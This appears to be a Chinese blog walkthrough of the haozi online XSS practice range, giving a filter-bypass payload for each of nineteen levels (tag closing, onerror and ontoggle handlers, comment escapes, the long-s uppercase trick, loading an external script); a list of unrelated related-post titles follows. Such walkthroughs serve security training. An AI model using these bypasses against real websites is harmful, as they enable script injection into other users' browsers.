XSS线上靶场---haozi
目录
线上靶场
0x00
0x01
0x02
0x03
0x04
0x05
0x06
0x07
0x08
0x09
0x0A
0x0B
0x0C
0x0D
0x0E
0x0F
0x10
0x11
0x12
线上靶场
alert(1)
https://xss.haozi.me/
0x00
这一关没有什么限制,直接<script>alert(1)<script>就过去了
0x01
这一关是将我们输入的数据放入到<textarea>标签里面了,但是<textarea>标签里面无法执行JS代码,另外这关没有对符号等有其他限制,所以我们先闭合<textarea>标签,在写入JS代码
</textarea><script>alert(1)</script>
PS:HTML标签有自动纠错功能,所以无论后面加不加上<textarea>对后面的标签进行闭合都可以执行这个代码
0x02
这一关是将我们输入的数据传输到value中,所以我们需要先闭合双引号,再执行JS代码
aa" οnclick="alert(1)
0x03
这一关对(、)、[ 、] 进行了限制,这时我们就可以考虑使用反引号代替括号执行JS代码,在执行的JS代码前面需要对value进行双引号闭合
aa" <script>alert`1`</script>
0x04
这一关对(、)、[ 、] 、` 进行了限制,我们无法使用反引号后使用将括号进行编码尝试进行绕过
aa" <img src=1 οnerrοr=alert(1)
0x05
这一关会将输入的内容放入注释符中,且对输入的注释符有过滤,使用js中的第二种注释符:--!>
aa" --!> <img src=1 οnerrοr=alert(1) 不用编码也可以绕过
0x06
过滤了js中的点击事件,将函数换行后再执行
aa" type="image" src=1 onerror 需要换行
=alert(1)
0x07
过滤了JS中的script等标签,尖括号等特殊符号也过滤了,html语言比较松散-->会对不对的语法进行补全,不加结束标签试试,不行,不能一对尖括号,所以我们使用<img标签
<img src=1 οnerrοr=alert(1) 需要再结尾进行换行
0x08
输入的内容放入了<stype>标签中,<stype>标签中的内容不执行JS,利用换行实现闭合<stype>,换行也绕过了正则表达式
</style 一定要在标签没有闭合的状态下换行
><img src=1 οnerrοr=alert(1)
0x09
正则表达式限制了必须以http开头,可以闭合前面的标签,在中间实现绕过,并使用//注释后面的内容。
http://www.segmentfault.com"></script><script>alert(1)//
0x0A
URL格式:@可以将前面的网站重定向到后面的网站。所以我们可以先创建一个JS脚本,然后将网站重定向到我们自己写的JS脚本
http://www.segmentfault.com@127.0.0.1/test.js
0x0B
toUpperCase() 方法用于把字符串转换为大写。 此题将我们输入的内容转化成大写,
利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过
<img src=1 οnerrοr=alert(1)>
<svg/οnlοad=alert(1)>
0x0C
对输入的数据进行大小写,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过
<svg/οnlοad=alert(1)>
<details open οntοggle=alert(1)>
0x0D
此关卡过滤了/[</"']符号,并且将输入的内容放入注释符内,我们需要先换行逃脱注释,写完弹窗函数后还需要换行将后面的符号注释掉。
#换了一行
alert(1)
--> #注释掉后面的单引号和括号
0x0E
此关卡对尖括号开头的字母进行了限制并且大写了字母,这时我们可以使用一个特殊符号 ſ --> 字符大写是会转成S,实现绕过
<ſvg/οnlοad=alert(1)>
<ſcript src="http://127.0.0.1/test.js"></ſcript> #我们通过引入自己的JS文件实现绕过
0x0F
这一关对很多符号进行了转义,但是可以直接识别,所以这样的编码限制没有太大作用,我们只需要将前面的闭合后弹窗将后面的字符注释掉就可以了。
bbb');alert(1)//
0x10
window.data就是一个全局变量,直接写alert相当于将alert传输到window.data
0x11
与F关 很类似,直接将前面的闭合,注释后面的就可以了
aa");alert(1)//
0x12
该关卡与11关相似,但是将双引号替换成了\\ ,我们需要加上\ 进行转义
aa\");alert(1)//
XSS线上靶场---haozi相关推荐
- XSS线上靶场---Warmups
目录 线上靶场网址 Ma Spaghet! Jefff Ugandan Knuckles Ricardo Milos Ah That's Hawt Ligma Mafia Ok, Boomer 线上靶 ...
- JAVA 线上故障排查套路,从 CPU、磁盘、内存、网络到GC 一条龙!
点击上方蓝色"方志朋",选择"设为星标" 回复"666"获取独家整理的学习资料! 线上故障主要会包括cpu.磁盘.内存以及网络问题,而大多数 ...
- JAVA 线上故障排查完整套路,从 CPU、磁盘、内存、网络、GC 一条龙!
点击上方"方志朋",选择"设为星标" 回复"666"获取新整理的面试文章 作者:fredal https://fredal.xin/java ...
- JAVA 线上故障排查完整套路!牛掰!
点击上方"方志朋",选择"设为星标" 回复"666"获取新整理的面试文章 来源丨8rr.co/kV3R 线上故障主要会包括 CPU.磁盘.内 ...
- JAVA 线上故障排查指南!
来源:https://fredal.xin/java-error-check 线上故障主要会包括cpu.磁盘.内存以及网络问题,而大多数故障可能会包含不止一个层面的问题,所以进行排查时候尽量四个方面依 ...
- 线上经验总结:一台 Java 服务器可以跑多少个线程?
一台java服务器能跑多少个线程? 这个问题来自一次线上报警如下图,超过了我们的配置阈值. 京东自研UMP监控分析 打出jstack文件,通过IBM Thread and Monitor Dump A ...
- 从 CPU、磁盘、内存、网络、GC 一条龙!JAVA 线上故障排查完整套路
线上故障主要会包括cpu.磁盘.内存以及网络问题,而大多数故障可能会包含不止一个层面的问题,所以进行排查时候尽量四个方面依次排查一遍.同时例如jstack.jmap等工具也是不囿于一个方面的问题的,基 ...
- java gc日志乱码_6000+字,30+张图。JAVA线上故障排查全套路总结。
fredalxin|https://sourl.cn/duWZhd 线上故障主要会包括 cpu.磁盘.内存以及 网络 问题,而大多数故障可能会包含不止一个层面的问题,所以进行排查时候尽量四个方面依次 ...
- 一整套Java线上故障排查技巧,爱了!
点击上方 好好学java ,选择 星标 公众号 重磅资讯.干货,第一时间送达 今日推荐:腾讯推出高性能 RPC 开发框架 个人原创100W+访问量博客:点击前往,查看更多 来源:fredal.xin/ ...
- 线上故障排查全套路盘点,运维大哥请自查!
[欢迎关注微信公众号:厦门微思网络] 线上故障主要会包括cpu.磁盘.内存以及网络问题,而大多数故障可能会包含不止一个层面的问题,所以进行排查时候尽量四个方面依次排查一遍.同时例如jstack.jma ...
最新文章
- NoSQL还是SQL?这一篇讲清楚
- C++, C#, Java, VB.NET,到底该选择哪一门语言?
- 第一个Win32 SDK应用程序
- LSGO软件技术团队2015~2016学年第七周(1012~1018)总结
- 吸收塔如何提高吸收率_想让肌肉生长得更好,蛋白质的补充很重要,如何选择你知道吗?...
- java程序设计_Java程序设计--接口interface(笔记)
- 面试官问你HashMap底层你用线程安全吊打他
- postgres 禁止远程登录_解决postgresql无法远程访问的情况
- Java常用到的快捷键
- CAS单点登录:CAS服务端搭建
- 微信小程序第三方平台开发配置
- golang学习(一)—— 简介
- 多线程处理大量数据 java
- Kudu 原理、API使用、代码
- 计算机微课用什么音乐,有关微课音乐课堂教学
- 数据结构|最小生成树问题
- 谷歌高清卫星地图转西安80坐标系
- 物联网卡发展历程与发展趋势
- 黑苹果alc269声卡仿冒id_Alc269声卡的一些信息
- 前端JS请求网络图片报错GET https://xxx.png 404 (Not Found)的解决办法